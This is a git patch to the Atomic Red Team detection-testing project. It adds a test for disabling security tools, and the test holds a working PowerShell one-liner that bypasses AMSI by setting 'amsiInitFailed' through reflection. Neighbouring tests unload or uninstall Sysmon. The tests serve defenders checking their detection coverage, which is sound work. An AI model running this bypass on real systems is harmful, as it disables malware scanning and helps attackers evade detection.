From d6d68477ac8ea79f77ddb0720cdf608ce6a950ea Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 17 Sep 2019 18:33:39 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1089/T1089.md   | 19 +++++++++++++++++++
 atomics/index.md         |  1 +
 atomics/index.yaml       |  9 +++++++++
 atomics/windows-index.md |  1 +
 4 files changed, 30 insertions(+)

diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md
index bf556b14..26467888 100644
--- a/atomics/T1089/T1089.md
+++ b/atomics/T1089/T1089.md
@@ -24,6 +24,8 @@
 
 - [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
 
+- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+
 
 <br/>
 
@@ -236,4 +238,21 @@ sc query sysmon > nul
 sysmon -i -accepteula
 ```
 
+<br/>
+<br/>
+
+## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
+Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. 
+https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`! 
+```
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+```
+
+
+
 <br/>
diff --git a/atomics/index.md b/atomics/index.md
index 01aadace..084699e1 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -193,6 +193,7 @@
   - Atomic Test #8: Unload Sysmon Filter Driver [windows]
   - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #10: Uninstall Sysmon [windows]
+  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index ca972ace..7e2ae3c6 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -6000,6 +6000,15 @@ defense-evasion:
         cleanup_command: 'sysmon -i -accepteula
 
 '
+    - name: AMSI Bypass - AMSI InitFailed
+      description: "Any easy way to bypass AMSI inspection is it patch the dll in
+        memory setting the \"amsiInitFailed\" function to true. \nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
   T1107:
     technique:
       external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 6a31951f..a5f132cd 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -37,6 +37,7 @@
   - Atomic Test #8: Unload Sysmon Filter Driver [windows]
   - Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
   - Atomic Test #10: Uninstall Sysmon [windows]
+  - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)